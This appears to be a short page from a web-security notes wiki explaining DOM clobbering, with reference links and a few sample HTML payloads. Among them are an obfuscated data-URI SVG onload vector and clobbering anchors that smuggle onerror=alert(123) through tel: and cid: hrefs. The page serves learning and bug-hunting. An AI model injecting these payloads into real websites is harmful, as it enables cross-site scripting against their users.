DOM clobbering

DOM clobbering is a technique in which HTML is injected into a page to manipulate the DOM and ultimately change the behavior of JavaScript on the page

So you can clobber a global variable or property of an object and overwrite it with DOM Node or HTML collection.

https://www.youtube.com/watch?v=eWD4LH5W2Es https://www.youtube.com/watch?v=7eZnQgluz1Q&list=PLWvfB8dRFqba4RedkuUDWMEkAkP8cdZCW https://www.youtube.com/watch?v=vgBAUvPJnT8 https://www.youtube.com/watch?v=sqlI-Tm-Bpg https://bugology.intigriti.io/intigriti-monthly-challenges/0124 https://challenge-0124.intigriti.io/ https://github.com/SoheilKhodayari/TheThing https://domclob.xyz/domc_wiki/techniques/windowNamedAccess.html https://portswigger.net/web-security/dom-based/dom-clobbering https://research.securitum.com/xss-in-amp4email-dom-clobbering/

<li><a href="https://example.com">Website</a></li>
<li><a href="mailto:m.bluth@example.com">Email</a></li>
<li><a href="tel:+123456789">Phone</a></li>  
<li><a href="cid:image-ref">Phone</a></li>  
<math><a xlink:href="//jsfiddle.net/t846h/">click
<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

//Check how href behave on different attributes

<a id="defaultAvatar"><a id="defaultAvatar" href="tel:asdf&quot;onerror=alert(123)//" name="avatar">
<a id="defaultAvatar"><a id="defaultAvatar" href="cid:asdf&quot;onerror=alert(123)//" name="avatar">

https://portswigger.net/web-security/dom-based

PreviousXSS NextCross-API Scripting (XAS)

Last updated 1 year ago